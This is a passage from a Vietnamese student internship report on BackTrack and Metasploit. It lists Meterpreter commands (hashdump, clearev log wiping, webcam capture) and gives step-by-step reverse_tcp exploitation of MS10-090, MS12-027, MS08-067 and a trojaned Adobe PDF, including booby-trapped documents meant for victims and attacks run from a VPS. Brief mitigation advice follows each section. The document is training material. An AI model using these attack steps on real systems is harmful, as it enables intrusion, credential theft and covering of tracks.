Chúng ta có thể lưu lại enviroment đã cấu hình thông qua lệnh save. Môi trường đó sẽ được lưu lại trong /.msfconfig và sẽ được load trở lại khi user interface được thực hiện.

Những options nào chung giữa giư các exploits module : LPORT, LHOST, PAYLOAD thì chúng ta sẽ xác định ở Global Enviroment.

Sử dụng Metasploit framework

1. Chọn module exploit : lựa chọn chương trình, lỗi mà Metasploit có hỗ trợ để khai thác. Show exploits : xem các module mà exploit mà framework hỗ trợ.

Use exploit_name : chọn exploit name.

Info exploit_name : xem thông tin về module exploit.

2. Cấu hình module exploit đã chọn. Show options : xác định những options nòa cần cấu hình.

Set : cấu hình cho những options của những module đó.

3. Verify những options vừa cấu hình. Check : kiểm tra những options đã được cấu hình chính xác chưa.

Page 24: Báo cáo cuối kỳ Athena - Report

TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA

Chương trình thực tập công nghiệp 2 Trang 23

4. Lựa chọn target : lựa chọn hệ điều hành nào để tiến hành. Show target : những target được cung cấp bởi module đó.

Set : xác định target nào.

5. Lựa chọn payload Payload là đoạn mã code sẽ chạy trên hệ thống remote machine.

Show payloads : liệt kê ra những payload của module exploit hiện tại.

Info payload_name : xem thông tin chi tiết về payload đó.

Set payload payload_name : xác định tên của payload module. Sau khi chọn payload nào ta dùng lệnh show

options để xem options của payload đó.

Show advanced : xem những advanced options của payload.

6. Thực thi exploit Exploit : lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho bạn những thông tin cần thiết.

Payload meterpreter

Meterpreter là viết tắt của meta-Interpreter là một advanced payload có trong Metasploit framework. Mục đích của nó là để cung cấp những tập lệnh để khai thác tấn công các remote computer. Nó được viết từ các developer dưới dạng shared project (.DLL) files. Meterpeter và các thành phần mở rộng được inject vào trong bộ nhớ RAM, hoàn toàn không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống virus.

Tập lệnh trong meterpreter:

help: Hiển thị menu giúp đỡ. Background: đưa về msf promt và meterpreter được chạy nền. cat: Hiển thị nội dung của một file. cd & pwd: chuyển đổi các thư mục hiện hành tại máy victim. clearev: xóa toàn bộ log của Application, System and Security trên hệ điều hành Windows. download: tiến hành download một file từ victim về máy. Sử dụng “\\” khi thao tác với các đường dẫn. edit: edit một file ở máy victim. Sử dụng trình soạn thảo vim để edit. execute: chạy một lệnh trên máy victim. getuid hiển thị thong tin user hiện tại meterpreter đang làm việc trên máy victim hashdump xem nội dung của SAM database idletime hiển thị thời gian mà người dung ở máy victim đã không hoạt động. ipconfig hiển thị các interface và các địa chỉ IP ở máy victim lpwd & lcd thay đổi thư mục hiện hành tại máy local ls hiển thị danh sách các file trong thư mục hiện hành ở máy victim. migrate đính meterpreter vào một process khác đang hoạt động ở máy victim ps hiển thị các process đang hoạt động ở máy victim resource chạy các lệnh meterpreter được định nghĩa trong một text file search tìm kiếm file trên máy victim shell tiến hành thao tác với shell của máy victim upload upload một file từ local lên máy vicim. Sử dụng “\\” khi thao tác với các đường dẫn trên. webcam_list hiển thị danh sách các webcam có thể sử dụng ở máy victim webcam_snap chụp ảnh bằng webcam ở máy victim.

Ở đề tài nhóm chủ yếu tập trung vào khai thác bằng payload này.

Page 25: Báo cáo cuối kỳ Athena - Report

GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng

Trang 24 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển

Tiến hành khai thác các lỗ hổng trên Windows XP qua localhost

Kết quả cuối cùng của việc khai thác các lỗ hổng này là tạo được một session với máy victim và đính payload meterpreter vào máy victim để chiếm quyền điều khiển và có thể tiến hành cài backdoor vào máy nạn nhân.

Khai thác lỗi MS10-090: lỗi của MSHTML trong trình duyệt IE6, IE7

Targets: Internet Explorer 6 hoặc 7 Chuẩn bị môi trường: Máy backtrack và máy victim có cài đặt IE6 hoặc IE7

Ta kiểm tra IP trên máy Backtrack bằng lệnh : ifconfig

Ta được IP của Backtrack : 192.168.24.128

Khởi động Metasploit của Backtrack bằng lệnh : msfconsole

Tìm kiếm mã lỗi trên Metasploit bằng lệnh : search ms10_090

Page 26: Báo cáo cuối kỳ Athena - Report

TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA

Chương trình thực tập công nghiệp 2 Trang 25

Sau khi search được mã lỗi ta dùng lệnh : use windows/brower/ms10_090_ie_css_clip

Dùng lệnh show options để thể hiện các thuộc tính cần thiết của mã lỗi.

Sau khi biết các thuộc tính cần thêm vào, ta thiết lập các thuộc tính sau :

set SRVHOST 192.168.24.128

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.24.128

set uripath /hack

Page 27: Báo cáo cuối kỳ Athena - Report

GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng

Trang 26 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển

Dùng lệnh exploit để tiến hành khai thác lỗi. Backtrack sẽ tạo ra một link http://192.168.24.128:8080/hack khi máy

XP truy cập vào địa chỉ này sẽ tạo một session đến máy backtrack.

Quay lại máy XP, mở trình duyệt IE và truy cập vào địa chỉ http://192.168.24.128:8080/hack

Page 28: Báo cáo cuối kỳ Athena - Report

TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA

Chương trình thực tập công nghiệp 2 Trang 27

Trên máy Backtrack bắt đầu có sự kết nối tới XP. Chúng ta đợi đến khi có địa chỉ kết nối vào ta sẽ tạo phiên kết nối.

Dùng lệnh sessions để kiểm tra.

Dùng lệnh sessions –i 1 để kết nối vao sessions 1.

Page 29: Báo cáo cuối kỳ Athena - Report

GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng

Trang 28 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển

Đến bước này meterpreter đã được inject vào trong máy của victim và ta có thể sử dụng các lệnh meterpreter thao tác lên máy victim.

Cách phòng tránh:

Không vào các đường link lạ, không rõ nguồn gốc. Sử dụng phiên bản mới nhất của Internet Explorer hoặc sử dụng các trình duyệt khác như Chrome, Firefox, …

Khai thác lỗi MS12_027: lổ hổng MS-Office 2007, 2010

Targets: Microsoft Office 2007, 2010

Chuẩn bị môi trường: Máy backtrack và máy victim Windows XP hoặc Windows 7 có cài đặt Microsoft Office 2007

hoặc 2010

Ta kiểm tra IP trên máy Backtrack bằng lệnh : ifconfig

Ta được IP của Backtrack : 192.168.24.128

Khởi động Metasploit và sử dụng lệnh để load mã lỗi

use exploit/windows/fileformat/ms12_027_mscomclt_bof

Page 30: Báo cáo cuối kỳ Athena - Report

TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA

Chương trình thực tập công nghiệp 2 Trang 29

Dùng lệnh: show options để xem cái option của mã lỗi

Thiết lập file mang mã độc dùng lệnh : set FILENAME report.doc

Thiết lập PAYLOAD

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.24.138

set LPORT 4443

Cuối cùng ta dùng lệnh exploit để tạo file word đã được đính mã độc. Sau khi có được file word này ta sẽ gửi cho nạn

nhân và tiến hành lắng nghe kết nối tại máy backtrack. Để bắt đầu lắng nghe kết nối ta dùng các lệnh sau:

use exploit/multi/handler

set LPORT 4443 /* Port này giống với port lúc tạo file mã độc */

exploit

Sau bước này, bất cứ khi nào victim mở file Word chứa mã độc thì ta sẽ có được một session với máy victim tiếp theo

ta sẽ làm việc với meterpreter để chiếm quyền điều khiển máy victim.

Cách phòng tránh

Không xem những tài liệu được gửi đến từ người lạ, có nguồn gốc không rõ.

Cập nhập bản vá lỗi cho MS-Word hoặc sử dụng phiên bản mới nhất của Microsoft Word (2013) hoặc một phần

mềm soạn thảo văn bản khác như Open Office.

Khai thác lỗi của Adobe Reader

Targets: Máy Adobe Reader v8.x, v9.x

Page 31: Báo cáo cuối kỳ Athena - Report

GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng

Trang 30 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển

Môi trường chuẩn bị: Máy backtrack và máy victim sử dụng Windows XP SP3 có cài đặt và dử dụng Adobe Reader

v8.x hoặc v9.x

Khởi động Metasploit của Backtrack bằng lệnh : msfconsole

Dùng lệnh

use exploit/windows/fileformat/adobe_pdf_embedded_exe

Dùng lệnh show options để thể hiện các thuộc tính mã lỗi

Page 32: Báo cáo cuối kỳ Athena - Report

TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA

Chương trình thực tập công nghiệp 2 Trang 31

Tiếp theo ta set INFIENAME:

set INFIENAME /home/target.pdf

/* Đây là file PDF bình thường không chứa mã độc */

set FILENAME evil.pdf

/* Đây là file PDF bình thường đã được đính kèm mã độc và sẽ được gửi đi cho victim */

exploit

Sau khi exploit file PDF nhận được, là file PDF bình thường đã được đính mã độc vào.

Tiếp theo ta tiến hành lắng nghe kết nối từ victim.

use exploit/multi/handler

set lport 4443

exploit

Page 33: Báo cáo cuối kỳ Athena - Report

GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng

Trang 32 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển

Cách phòng tránh

Lỗi này có thể dễ dành nhận biết được khi tiến hành mở file PDF.

Tại khung File, nếu để ý kỹ phần phía trên đoạn text này sẽ chứa một

đoạn mã rất dài và được cover lại bằng một đoạn text trống để nạn

nhân khó nhận biết được.

Để ngăn chặn việc tấn công ta chỉ cần ấn Do Not Open là sẽ chặn được

việc khai thác này.

Đây thực chất không phải là lỗ hổng hay lỗi của phần mềm mà đây là

một chức năng của Adobe Reader, nhưng chức năng này đã bị hacker lợi dụng cho mục đích xấu. Nên người dùng cần

phải hết sức thận trọng.

Khai thác mã lỗi MS08_067: lỗ hổng của hệ điều hành Windows XP

Targets: Windows XP tất cả các Service Pack

Môi trường chuẩn bị: Máy backtrack và máy victim sử dụng Windows XP

Tiến hành khai thác:

use exploit/windows/smb/ms08_067_netapi

Page 34: Báo cáo cuối kỳ Athena - Report

TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA

Chương trình thực tập công nghiệp 2 Trang 33

Dùng lệnh show options để hiển thị các thông số cần cài đặt và tiến hành cài đặt các thông số này.

set RHOST 192.168.174.130

Cài đặt PAYLOAD với các thông số và tiến hành khai thác.

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.174.128

exploit

Cách phòng tránh:

Đây là một lỗi rất nguy hiểm vì khi bị hacker tấn công, ở máy nạn nhân không hề có bất kỳ dấu hiệu nào đáng ngờ. Vì

thế cần thiết phải update bản vá lỗi cho Windows XP để tránh khỏi việc bị tấn công.

Thông tin chi tiết về mã lỗi xem tại

https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

Page 35: Báo cáo cuối kỳ Athena - Report

GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng

Trang 34 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển

Tấn công qua mạng Internet, triển khai trên VPS

VPS là gì

Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật lý thành nhiều máy chủ ảo.

Trong khi trên một server chạy một Share Host thì có thể có hàng trăm tài khoản chạy cùng lúc, nhưng trên server

chạy VPS thì con số này chỉ bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều.

Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản lý root và có thể restart

lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị hack local.

Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server, nếu 1 Website bị tấn

công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác cùng server, riêng server VPS, một tài khoản

trên VPS bị tấn công thì mọi tài khoản khác trên VPS đều hoạt động bình thường.

VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, nếu chạy trên Share Host sẽ

không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình

server,….

Đặc điểm VPS

Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng RAM riêng, dung lượng ổ

HDD riêng, địa chỉ IP riêng và hệ điều hành riêng.

Tiết kiệm được nhiều chi phí so với việc thuê một server riêng.

Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có thể cài đặt để thực hiện

những yêu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao…

Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà không cần phải khởi động lại hệ

thống.

Có thể cài lại hệ điều hành với thời gian từ 5-10 phút.

Giá trị sử dụng của VPS

Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp.

Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng.

Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng.

Được cấu hình và cài đặt hệ thống Firewall và Ddos Protection.

Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.

Khai thác thông qua VPS

Việc khai thác thông qua VPS được tiến hành thực hiện tương tự trên localhost.

Nhưng đối với VPS sử dụng hệ điều hành Windows ta phải tiến hành cài đặt phần mềm Metasploit và tiến hành khai

thác như trên Backtrack.

Metasploit có thể download tại đây: http://www.metasploit.com/

Giao diện của Metasploit trên Windows

Page 36: Báo cáo cuối kỳ Athena - Report

TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA

Chương trình thực tập công nghiệp 2 Trang 35

KẾT QUẢ ĐẠT ĐƯỢC SAU QUÁ TRÌNH THỰC TẬP

Trong suốt quá trình thực tập tại Trung tâm đào tạo quản trị & an ninh mạng Athena em đã có thêm nhiều kinh nghiệm.

Về kiến thức: ôn lại kỹ năng đã học, nâng cao khả năng học hỏi, trao dồi thêm nguồn kiến thức mới.

Về kỹ năng tổ chức điều hành công việc: có cơ hội làm việc nhóm để rèn luyện kỹ năng làm việc nhóm tốt hơn và khả năng phân chia công việc để hoàn thành đúng tiến độ.

Về thái độ, trách nhiệm: có trách nhiệm với công việc, luôn hoàn thành mục tiêu đặt ra.

Page 37: Báo cáo cuối kỳ Athena - Report

GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng

Trang 36 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển

TÀI LIỆU THAM KHẢO

Tài liệu tham khảo chủ yếu của trung tâm Athena và một số nguồn khác.

http://www.hackingarticles.in

https://www.youtube.com

http://www.hackyshacky.com

i Nguồn: http://athena.edu.vn/home/gioi-thieu-athena.html ii Nguồn: Sách CEH Lab Book – Trung tâm đào tạo quản trị & an ninh mạng Athena iii Nguồn: http://www.windowsecurity.com/whitepapers/windows_security/Windows-Enumeration-USER2SID-SID2USER.html